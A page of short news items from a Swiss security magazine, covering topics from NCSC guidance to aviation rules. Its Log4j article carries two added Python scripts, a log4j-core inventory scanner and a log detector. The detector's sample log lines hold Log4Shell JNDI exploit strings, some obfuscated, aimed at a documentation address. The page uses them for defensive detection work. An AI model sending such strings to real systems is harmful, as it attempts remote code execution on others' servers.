NCSC: New tools for authorities

The National Cyber Security Center (NCSC), together with the Swiss Security Association (SVS), has been offering targeted information for authorities on its website for a week now.

National Center for Cybersecurity

The NCSC has been offering targeted content for private individuals, companies and IT specialists on its website for some time. Information for public authorities is now also explicitly offered.

In addition to current topics and concrete instructions for action, it addresses threats in cyberspace to which authorities may be exposed. According to the NCSC, care was taken to integrate existing knowledge when compiling the content.

For example, the "Guide for Municipalities" of the Network for Investigative Support in Digital Crime Prevention (NEDIK) forms an important basis. In addition, a selection of further information from other organizations dealing with cybersecurity topics can be found. The content is coordinated in cooperation with the Swiss Security Association (SVS) and is continuously supplemented.

In the context of the implementation of the NCS, this information offer for authorities is also an accompanying measure with regard to the implementation of measure 1 "Early recognition of trends and technologies and knowledge building". In this regard, the SVS is working on an "e-learning tool" that will be available to all municipal, cantonal and federal administrations in the course of 2022. This will be used to train employees on best practices in cyber and information security.

Information for authorities

Source: NCSC

 

Home office: When supervisors monitor their employees

A study by VMware in Germany shows a significant loss of trust and increased staff turnover when employees are monitored while working from home.

Home office monitoring

According to a study by multi-cloud service provider VMware, the remote monitoring measures being pushed by many companies are jeopardizing the trust of employees working from home and increasing staff turnover. According to the study, 60 percent of the German companies surveyed have either already introduced or are planning to introduce measures to monitor employee productivity since the switch to hybrid forms of working.

Secret spying

Monitoring of email (41 percent), collaboration tools (41 percent) and web browsing (30 percent), as well as video surveillance (30 percent), webcams (25 percent) and keylogger software (25 percent), is commonplace. However, 34 percent of companies that have already implemented device monitoring, and 45 percent of those currently introducing it, report increased or even dramatically increased employee turnover.

Monitoring is often not communicated transparently, the study shows: 30 percent of employees do not know whether their company has introduced systems to monitor productivity on their devices.

"A lack of transparency, surreptitious measurement and hidden control can quickly erode employee trust and lead to talented and motivated employees preferring to quit in a highly competitive and challenging skills market," Ralf Gegg, Head of Sales, End-User Computing Division at VMware, concludes, commenting on the study results.

(www.pressetext.com)

Federal government signs four contracts to develop Covid-19 drugs

The Swiss government has signed contracts with four Swiss-based companies to develop Covid-19 drugs. The total amount is approximately 27 million Swiss francs.

Covid 19 drug
©Pixabay

The four contracts for Covid-19 drugs are the result of a request for proposals that the federal government issued in summer 2021 as part of its Covid-19 drug promotion program.

The total amount is around 27 million Swiss francs. The funding program will run until the end of 2022. It is intended to support the development of potentially important drugs to combat Covid-19. The contracts were signed with the following companies:

- GeNeuro SA, for the development of a monoclonal antibody to treat the long-term effects of Covid-19 (Long Covid) in patients suffering from severe neuropsychiatric symptoms;

- Kinarus AG, for the development of an oral combination therapy with antiviral and anti-inflammatory activity for all severities of Covid-19;

- Memo Therapeutics AG, for the development of an inhaled or intravenous monoclonal antibody for the treatment of infections with SARS-CoV-2, in patients at risk for a severe course of Covid-19;

- Noorik Biopharmaceuticals AG, for the development of an oral pulmonary vasodilator, to prevent respiratory failure and reduce the need for mechanical ventilation in the event of hospitalization due to Covid-19.

The new drugs are expected to be available by the end of 2022.

Swissbau and Safety Congress to be postponed

Swissbau in Basel will not take place in January as planned; it has been postponed to May 3-6, 2022. The same applies to the Safety Congress organized by Save AG.

postponed

Due to the current Covid-19 situation, the conditions for an official permit to hold Swissbau in January 2022 are not met, writes MCH Swiss Exhibition (Basel) Ltd. It has therefore been decided to postpone Switzerland's largest platform for the construction and real estate industry: the event will now be held in Basel from Tuesday, May 3 to Friday, May 6, 2022.

The exhibitors are behind the decision: In initial discussions with leading exhibitors from all sectors, despite the great disappointment, there was also clear support for a postponement to next spring, as the organizers emphasize.

Safety Congress: new dates

The Safety Congress, organized by Save AG, should have been held in parallel with Swissbau. It will also be postponed and will now take place on the Swissbau dates in May 2022. Due to the postponement, there may be slight changes to the program, according to Save AG.

For more info on the fair: www.swissbau.ch

For more info on the Safety Congress: www.save.ch

Critical vulnerability in Java library "Log4j"

A zero-day vulnerability in the widely used Java library "Log4j" became known at the end of last week. The vulnerability is classified as critical because the library is built into very many Java applications.

Log4j
© depositphotos, SWEviL

Last Friday, NCSC received reports of a critical vulnerability in the popular Java library "Log4j". The library is widely used in many commercial and open source software products.

The vulnerability (CVE-2021-44228) is critical because it can be exploited remotely by an unauthenticated attacker to execute arbitrary code. The flaw lies in the library's message lookup feature: a string such as ${jndi:ldap://...} contained in any logged input causes Log4j to fetch and load a remote object, so any application that logs attacker-controlled data is exposed. Its severity is rated 10.0 (out of 10) in the Common Vulnerability Scoring System (CVSS).

Apply security patches quickly

Since many third-party vendors use "Log4j" in their products, they are working hard to release patches for their products. In the past 48 hours, many vendors have published security patches for their products. NCSC urges organizations and national critical infrastructures to review their software landscape for use of "Log4j" and apply the appropriate patches as soon as possible. If patching is not possible, it is recommended that all possible remedial actions be taken to prevent further damage.
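The inventory step the NCSC asks for above (finding where "Log4j" sits in your software landscape) is the part most organizations struggled with, because log4j-core is usually buried inside application archives rather than installed as a standalone package. The following Python script is an added example written for this page, not NCSC or GovCERT tooling: it walks a JAR, recurses into nested JARs/WARs/EARs, reads the log4j-core version from the Maven pom.properties entry and checks whether the JndiLookup class is still present. The version floor of 2.15.0 for CVE-2021-44228, the treatment of an unknown version as affected, and the fat JAR built in demo() are my assumptions and constructed test data, not artifacts from the article.

```python
"""Inventory scan for log4j-core inside JAR files, including JARs nested in
fat/uber JARs. Added example for this page; not NCSC/GovCERT tooling.

Assumptions (mine, not from the article):
  * Maven-built log4j-core releases carry a pom.properties with a "version=" line.
  * CVE-2021-44228 is fixed from log4j-core 2.15.0 on (FIX_VERSION). The Java 7
    branch 2.12.2 and the Java 6 branch 2.3.1 were also patched; this simple
    numeric floor will flag those as affected, so review such hits manually.
"""
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIX_VERSION = (2, 15, 0)
NESTED_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """Return (major, minor, patch) from a pom.properties 'version=' line, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.MULTILINE)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def scan_jar_bytes(data, path, findings, depth=0):
    """Inspect one archive given as bytes; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (e.g. a plain .class blob); nothing to do
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": has_jndi,
                # Affected by CVE-2021-44228 if the lookup class is still shipped
                # and the version is unknown or below the first fixed release.
                "cve_2021_44228": has_jndi and (version is None or version < FIX_VERSION),
            })
        if depth < 8:  # bounded recursion: do not follow absurdly deep nesting
            for name in sorted(names):
                if name.lower().endswith(NESTED_SUFFIXES):
                    scan_jar_bytes(zf.read(name), f"{path}!/{name}", findings, depth + 1)


def scan_jar_file(filename):
    """Scan an archive on disk and return the list of findings."""
    with open(filename, "rb") as fh:
        findings = []
        scan_jar_bytes(fh.read(), filename, findings)
        return findings


def _build_jar(entries):
    """Construct an in-memory archive from {name: bytes} (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo():
    """Constructed fat JAR bundling an affected log4j-core 2.14.1 and a patched 2.17.1."""
    class_stub = b"\xca\xfe\xba\xbe"  # Java class-file magic; body is irrelevant here
    old = _build_jar({POM_PROPS: b"version=2.14.1\n", JNDI_CLASS: class_stub})
    new = _build_jar({POM_PROPS: b"version=2.17.1\n", JNDI_CLASS: class_stub})
    app = _build_jar({
        "lib/log4j-core-2.14.1.jar": old,
        "lib/log4j-core-2.17.1.jar": new,
        "com/example/App.class": class_stub,
    })
    findings = []
    scan_jar_bytes(app, "app.jar", findings)
    return findings


if __name__ == "__main__":
    for f in demo():
        state = "AFFECTED" if f["cve_2021_44228"] else "ok"
        print(f"{f['path']}: log4j-core {f['version']} JndiLookup={f['jndi_lookup_present']} -> {state}")
```

Run scan_jar_file() over every .jar/.war/.ear found on a host (for example from a find command) to build the inventory; hits with version None are archives where the lookup class is present but the Maven metadata was stripped, which is common in shaded builds and should be treated as affected until proven otherwise.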

Private individuals also affected

But not only companies are at risk. The "Log4j" library is also present in many network and system components used in the private sector. It is therefore important for private individuals to keep their systems (computers, tablets, smartphones, WLAN routers, printers, etc.) up to date at all times and to ensure that they are updated regularly. In this way, the security patches that are continuously made available by the manufacturers can be installed as quickly as possible.

Warnings to potentially affected organizations

The NCSC is in constant contact with national and international partners on the issue. On Saturday, it began notifying potentially affected organizations in Switzerland about vulnerable "Log4j" instances reachable from the Internet. Such notifications were also sent to several national critical infrastructures.

Although the vulnerability could be used for targeted attacks on national critical infrastructures, the NCSC has not received any reports of this to date. The exploitation attempts observed so far have been used to spread mass malware such as "Mirai", "Kinsing" and "Tsunami" (also known as Muhstik). These botnets are primarily used for DDoS attacks (Mirai, Tsunami) or for mining cryptocurrencies (Kinsing).
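The mass exploitation attempts mentioned above arrive as ${jndi:...} lookup strings in any request field that ends up in a log line (User-Agent, path, arbitrary headers), and they are frequently obfuscated with nested lookups that Log4j resolves before the JNDI lookup fires. The Python detector below is an added example for this page, not the GovCERT IOC list: it normalizes URL encoding and the nested ${lower:...}, ${upper:...} and ${...:-default} forms the way Log4j 2's substitution does, then flags any resulting ${jndi:...}. The sample access-log lines are constructed (RFC 5737 documentation addresses), and collapsing unresolvable lookups to the empty string is my choice to favor recall over fidelity.

```python
"""Detect Log4Shell-style JNDI lookup strings in web access logs, including the
obfuscated variants used by mass scanners. Added example; not GovCERT's IOC list.
"""
import re
import urllib.parse

# Innermost ${...} expression, i.e. one with no nested "${" or "}" inside.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(expr):
    """Resolve one innermost lookup for the cases abused in the wild.

    Mirrors Log4j 2 behaviour for ${lower:x}, ${upper:x} and the ':-' default
    syntax (${env:NOPE:-j} and ${::-j} both yield "j"). Any other lookup that
    cannot be evaluated offline collapses to "" (assumption: prefer recall).
    """
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    key, sep, arg = expr.partition(":")
    if sep and key.lower() == "lower":
        return arg.lower()
    if sep and key.lower() == "upper":
        return arg.upper()
    return ""


def normalize(text, max_rounds=20):
    """Undo URL encoding, then repeatedly resolve innermost lookups.

    A ${jndi:...} expression is never rewritten, so once it surfaces the loop
    ends; max_rounds bounds pathological inputs.
    """
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def sub(match):
            nonlocal changed
            expr = match.group(1)
            if expr.lower().startswith("jndi:"):
                return match.group(0)
            changed = True
            return _resolve(expr)

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


def find_jndi(line):
    """Return every ${jndi:...} payload present in a line after normalization."""
    return JNDI.findall(normalize(line))


def scan_log(lines):
    """Return (line_number, payload) for each hit in an iterable of log lines."""
    return [(n, p) for n, line in enumerate(lines, 1) for p in find_jndi(line)]


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0100] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:10:01:05 +0100] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [13/Dec/2021:10:01:09 +0100] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [13/Dec/2021:10:01:14 +0100] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [13/Dec/2021:10:02:00 +0100] "GET /price?usd=$100&note=${env:HOME} HTTP/1.1" 200 50 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

Lines 2 to 4 are flagged (plain, nested-lookup obfuscated, and URL-encoded), while the benign "$100" and the harmless ${env:HOME} lookup on line 5 are not. A hit only proves an attempt was logged; whether it succeeded depends on the version and configuration of the log4j-core that processed the string.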

Recommendations and helpful information

For system administrators, NCSC has provided recommendations on how to proceed on GovCERT's blog, as well as the list of indicators of possible compromise (IOCs):

Blog GovCERT: Zero-Day Exploit Targeting Popular Java Library Log4j (available in English)

Source: NCSC

 

Measurement technology for networks

Everyone who operates a corporate and telecommunications network will at some point be in the situation of having to perform measurements: on the one hand, to check the quality of the cabling during an acceptance test; on the other hand, to want to identify transmission errors during subsequent operation; but also generally to check performance.

When testing networks, it is important not only to analyze the cabling itself (the cable category such as Cat 5 or Cat 6, and its construction, i.e. shielding and wire cross-section) but also to select the appropriate measuring device. The range of devices from manufacturers such as Fluke Networks, Ideal Industries, NetAlly, Netscout and others is hard to survey. Very simple network testers for copper cables start at 30 to 40 Swiss francs, while professional models can cost more than a thousand times as much. To separate the wheat from the chaff, or to find the right device for a given purpose, the devices can be grouped into application categories. The very simple devices only check whether there is electrical continuity between two cable terminations and whether wire pairs are crossed or swapped.

End of measuring bar
©depositphotos

So-called verification testers are a step up from continuity testers. They also test basic cable continuity, and in addition can locate cable runs with a so-called "toner", for example where the documentation is inadequate. Some can measure the cable length, or the distance to a break or short circuit, by means of TDR (time domain reflectometry). They therefore work on layer 1 (the physical layer) of the OSI model and verify the electrical signaling and the physical cabling components. The OSI model (Open Systems Interconnection model) is a reference model that describes network protocols as a layered architecture. Another feature that helps when PoE (Power over Ethernet) devices malfunction is the PoE switch verification offered by some testers: it determines which PoE class the switch can supply, and thus whether the switch can deliver sufficient power for the PoE end device, and over which wire pairs power is supplied.

Qualification testers offer, in addition to the capabilities of verification testers, further tests to check existing cabling against new requirements and to allow more in-depth troubleshooting. They qualify the bandwidth of the cabling and identify faults that impair it, and thus indicate whether a link, including patch cables, is qualified for 10/100Base-T or Gigabit Ethernet. Nevertheless, like verifiers, they work on layer 1 of the OSI model, so the added value, and the surcharge, compared with a verifier should be examined carefully. A qualifier also does not provide proof of performance in the way a certifier does.

Certification testers verify compliance with industry standards and are required by many structured cabling manufacturers before they issue warranties for new installations. They indicate whether a link complies with a TIA (Telecommunications Industry Association) category or an ISO (International Organization for Standardization) class, such as Category 6 or Class E: they inject high-frequency signals into the line and deliver an actual "pass" or "fail" against the relevant structured cabling standards. Tests on copper and fiber optic cabling can be performed alike, again only on layer 1 of the OSI model. Software for exporting extensive data and reports allows the measurement results to be documented digitally.

Transmission testers offer, beyond the devices described above, the ability to perform network measurements on layers 2 and 3 of the OSI model as well, on copper and fiber optic cabling in both the LAN (local area network) and the WAN (wide area network). With transmission testers, network and PoE load tests are possible, as are ping tests, switch port identification and network configuration checks.

This technical report originally appeared in the printed edition SicherheitsForum 5-2021.


Windows Defender occupies new top position

Windows 11 and Windows 10's own security system has received top marks in an independent antivirus comparison.

Windows
©depositphotos

Windows Defender is part of the security system built into Microsoft's operating system; it monitors the Windows firewall and other relevant parts of the operating system and is found under the system settings. The built-in antivirus, present in both Windows 10 and Windows 11, is installed and active by default. Once again the program received a top score from the independent German antivirus testers AV-Test in Magdeburg in a comparison with other antivirus solutions.

The comparison with 21 other current antivirus solutions dates from the end of October. Windows Defender version 4.18 held its own under Windows 10 Home with the maximum overall score of 18 points. The test criteria included defense against cyberattacks, malware and malicious emails.

AV-Test awards up to six points in each of three categories: protection, performance and usability. The evaluations also give consumers an indication of the current quality of protection and of improvements to the protection programs.

Source: AV-Test

The rights and duties of a safety officer

Hardly a day goes by when there is no talk in the media of a corporate scandal, of criminal proceedings against managers and directors of large, but also of small and medium-sized companies. "Legal traps lurk around every corner", but many managers are not aware of their personal liability.

Safety Officer

A "risk catalog" should contain key points that frequently give rise to issues that are relevant to damage and liability and can therefore also pose a threat to the company. Once the corresponding weak points have been identified, they must be discussed by the management so that appropriate risk scenarios can be developed and preventive or defensive measures can be initiated.

These tasks, however, require people who have not only professional, interpersonal, communicative and integrative skills, but who can also identify shortcomings and manage crises in a problem-solving manner. Safety officers have the often thankless task of pointing out what is wrong: they must uncover weak points and push for remedial action.

This often leads to conflicts with employees and superiors. Safety officers usually have to face unpleasant tasks in which they have to comply unambiguously with the requirements of occupational safety and health protection in the company and break resistance where action appears to be required in accordance with the law.

What must be observed?

Step 1: Company analysis and information:
Insofar as the company has historically had no significant incidents of damage, has a defined and communicated organizational structure and procedures, and has clear rules of conduct in the event of a crisis, only supplementary measures in the area of continuous training and information of employees and managers, as well as routine spot checks by regular bodies such as financial and production controlling or auditing, are appropriate.

Step 2: Delegation of responsibility:
Time and again, it happens that no one feels responsible in the event of a loss - blame and mistrust are the result. If a company is at increased risk due to its size, its decentralized management or due to a special situation, but there are no concrete indications of actual cases of damage, the possible worst-case scenario should nevertheless be prevented with a clear assignment of special responsibility as well as material and personnel resources. Management tools useful for this purpose, such as compliance programs, compliance officers, written codes of conduct, risk identification systems, written audit plans, etc., can already identify threatening risk situations at an early stage and can provide initial signals for rapid action.

Step 3: Monitoring / crackdown:
In most cases, when suspicions arise or even when damage occurs, the causes are not consistently investigated and appropriate action is taken in the event of proven violations. If the company finds itself in a situation of recurring problem situations with a high potential for danger, concrete suspicions and legal violations or damage that have already occurred, measures must be initiated immediately that are aimed at remedying the damage and holding those responsible accountable depending on the breach of duty. However, this often requires corresponding internal "powers of intervention" and a catalog of disciplinary measures in this regard, which must be adopted in advance within the company and communicated at all levels of the company. If, in addition, the offenses are relevant under labor law or even criminal law, the necessary steps must be taken under labor law, which should not stop at criminal charges in order to send clear signals.

But what if the safety officer is not heard? What should they do if management does not support their actions and leaves them to their own devices? Ridiculing employees who strive to comply with safety rules and safety standards, and who deal with hazard identification and risk assessment on a daily basis, is frowned upon. Safety officers are entitled to the full attention of supervisors and management. If they are not given this recognition, they are obliged to report violations and concerns unequivocally to management in writing. Civil and criminal responsibility then rests with that level of management, whose representatives are now "condemned" to act because of their actual and legal ability to do so.

But employees must also be aware of their operational responsibilities. They should know that their health and well-being are also on the line if they disregard occupational safety measures, fail to comply and thus expose colleagues to hazards. They, too, have a duty to cooperate in recognizing, containing and reporting risks; to this end, the relevant awareness must be trained and exemplary behavior must be recognized and rewarded. All of this requires courageous action, a convincing demeanor, and sometimes unwelcome measures for the good of the company and lawful and responsible action, especially from the company's management, but above all from the safety officers.

This technical report originally appeared in the printed edition SAFETY-PLUS 3-2021.


System hears when machines run hot

Unforeseen machine failures cost a lot of money. However, sound-based emissions from machines could be analyzed with comparatively inexpensive microphones to detect damage at an early stage. 

A new AI monitoring system developed by researchers at Kaunas University of Technology (KTU) in Lithuania analyzes sound emissions, as machine operators once did by ear, in order to detect incipient damage at an early stage. Experts estimate that unforeseen machine failures cost global industry around one trillion dollars every year.

Expensive machine downtime

"Since sound data is easy to collect due to the relatively low installation costs of microphones for existing plants, sound data-based methods are of great interest," explains KTU computer scientist Rytis Maskelinas. In very noisy factories, however, sound emissions from machines are superimposed by extraneous noise, which often leads to misinterpretations. In this way, damage is indicated that does not exist. The result is expensive machine downtime.

Maskelinas and his colleagues use a damage detection method based on real sound data from industrial machines in perfect working order. The algorithm developed by the researchers in Lithuania compares this data with the sound emissions of the machine on which faults are to be detected. In a training process, the software learns, so to speak, to concentrate only on the sounds of "its" machine and to block out other noise.

Deployment in poorer countries

Modern machines are equipped with a wide range of sensors that ensure reliable early detection of damage. But there are still countless plants, especially in less developed countries, that are not so well equipped. It is for these that Maskelinas has developed the system. He has drawn on an extensive data set of sounds from four pieces of technical equipment. The plan is to expand this data set to include other systems.

(www.pressetext.com)

Innovation crucial for Switzerland

Around 220 guests from business, science, the armed forces and administration met in the multipurpose hall of the barracks in Bern on November 4, 2021. The Chief of the Armed Forces, Corps Commander Thomas Süssli, and the Head of Armasuisse Science and Technology, Thomas Rothacher, gave presentations.

Innovation
©VBS/DDPS, Claudia Christen

Around 220 guests from business, science, the armed forces and administration met on November 4, 2021 in the multipurpose hall of the barracks in Bern for this year's industry orientation. Following the invitation of the Chief of Armament Martin Sonderegger, the Chief of the Armed Forces, Corps Commander Thomas Süssli, and the Head of Armasuisse Science and Technology, Thomas Rothacher, gave presentations.

Martin Sonderegger opened the industry orientation with the currently topical subject "Security of the Future - Security for Switzerland". In his presentation, the Chief of Armament addressed current procurements relevant to security policy, including offset transactions and the associated importance of Switzerland's security-relevant technology and industrial base (STIB).

Corps Commander Thomas Süssli then spoke on "Why innovation is crucial for our security". In his remarks, he pointed out that innovation is central to Switzerland as a business location, but also to the future of the Swiss Armed Forces. The ability to innovate, he said, is the key to long-term success.

The exponential development of technology with the fourth industrial revolution, scarce resources as well as the struggle for talent required constant questioning. The third speaker was Thomas Rothacher, who said that the rapid pace of technological change requires both civilian and military organizations to find new ways of finding solutions. These, Rothacher said, would only lead to success if all the circles involved were involved. Rothacher also presented new instruments and platforms in this context.

Source: Armasuisse

The office of the future

Flexible working models, a work-life balance and the breaking up of outdated structures form the concept of a new work culture in which the employee is the focus. Everyday office life has thus already changed - this offers new opportunities, but can also entail certain risks.

Home Office

Working from home offers a variety of advantages: Long commutes are eliminated, as is the stress and time involved, resulting in a gain in free time. The start of the workday is much more relaxed. However, the general time management of the working day should also be mentioned here, as you can sometimes organize it much more individually in the home office.

In addition to the advantages that this form of work offers, it unfortunately also involves some risks - there are also disadvantages on a social level: Exchanges with colleagues, a little chat over coffee or any other spontaneous encounters are not possible in the home office.

Recommended office chairs for the seated area

Both active-dynamic sitting and height-adjustable desks are still on the rise and offer a welcome change for your back. But what is actually meant by this? With active-dynamic sitting, you change your sitting posture as often as possible. True to the motto: the next sitting posture is the better sitting posture. This is promoted by active office chairs, which, depending on the system, also unconsciously ensure a higher number of posture changes than is the case with conventional "immobile" office chairs. This is why they are particularly recommended for people who are dependent on additional movement impulses due to their almost exclusively sedentary activities.

Tip: Spend 30 percent of working time standing up

By the way: you should spend at least 30 percent of your working time standing. In addition to height-adjustable desks, mobile sit-stand desks offer an optimal and, above all, flexible way to achieve this, especially as a supplement to the classic desk. They let you do one or another activity standing, independently of the desk, and because they are mounted on castors you are not bound to a fixed spot and can easily move your workplace to other rooms. Mobile sit-stand desks thus bring about a change of posture almost automatically.

To do your back some additional good, you can build small exercise units into your daily office routine. Simple stretching exercises are a good start: they relax the muscles and keep them flexible. But it is also important to get away from your desk sometimes. Use your lunch break or the time after work for a walk or other small exercises.

Switzerland adopts new EU aviation regulations as of February

The Swiss-EU Joint Aviation Committee today approved Switzerland's adoption of various EU decrees. The new regulations concern aviation safety and air traffic management.

Aviation
©depositphotos

The Federal Council approved the adoption of new provisions of various EU decrees in favor of aviation at its meeting on November 24, 2021. These will now enter into force on February 1, 2022. As part of its participation in the Single European Sky, Switzerland is adopting a resolution that sets Europe-wide performance targets for the air traffic management network.

Based on this, Switzerland must submit national performance plans with binding specifications for the areas of safety, the environment, capacity and cost efficiency for Skyguide AG. This enables more direct flight routes and thus protects the environment, increases punctuality and reduces the cost of a flight.

Switzerland is also adopting a legal act that will enable the future introduction of a European risk classification system. The purpose of this system is to define and classify safety-relevant events in the same way throughout Europe, which will enable immediate measures to be determined. Other regulations that Switzerland is adopting relate to the design and installation of non-safety-relevant components in aircraft. This will significantly reduce the administrative work that has been necessary to date.

Christian Hegner, Director of the Federal Office of Civil Aviation (FOCA), signed the decision on behalf of Switzerland. The new provisions of the agreement will enter into force in Switzerland on February 1, 2022.

Source: Bazl
